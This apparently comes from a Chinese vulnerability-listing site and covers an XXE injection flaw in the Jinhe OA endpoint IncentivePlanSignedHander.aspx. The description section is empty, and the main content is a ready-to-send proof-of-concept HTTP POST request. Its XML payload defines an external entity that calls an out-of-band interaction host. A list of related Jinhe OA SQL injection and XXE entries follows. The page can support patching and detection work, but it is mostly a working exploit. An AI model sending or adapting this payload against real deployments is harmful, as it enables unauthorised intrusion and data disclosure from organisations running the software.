金和OA IncentivePlanSignedHander.aspx 存在XML注入漏洞

漏洞描述

PoC代码

POST /c6/JHSoft.Web.IncentivePlan/IncentivePlanSignedHander.aspx/?type=saveitemjudgement HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 158
Content-Type: application/Xml
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://d3qqel9lt95jmc599a70ri18fy3dbxbbf.oast.online" >]>
<value>&xxe;</value>

相关漏洞推荐

• 金和OA ArchivesRoomUpdate.aspx SQL注入漏洞
• 金和OA ArchivesShowAcceptAip SQL注入漏洞
• 金和OA ArchivesRoomDeptSave.aspx 存在XML注入漏洞
• 金和OA ArchivesInfoAskAip.aspx SQL注入漏洞
• 金和OA ArchivesInfoSendAip.aspx SQL注入漏洞
• 金和OA ArchivesAdviceAdd.aspx 存在SQL注入漏洞
• 金和OA ArchivesInfoAcceptAip.aspx SQL注入漏洞
• 金和OA ArchivesInfoAsk.aspx SQL注入漏洞
• 金和OA ArchivesDossierExec.aspx SQL注入漏洞
• POC 金和OA ArchivesAdviceInsert.aspx SQL注入漏洞
• 金和OA ArchivesCatalogDocPrint.aspx SQL注入漏洞
• POC 金和OA ArchivesAdviceAdd.aspx SQL注入漏洞
• POC 金和OA appraise-XmlHttp XXE漏洞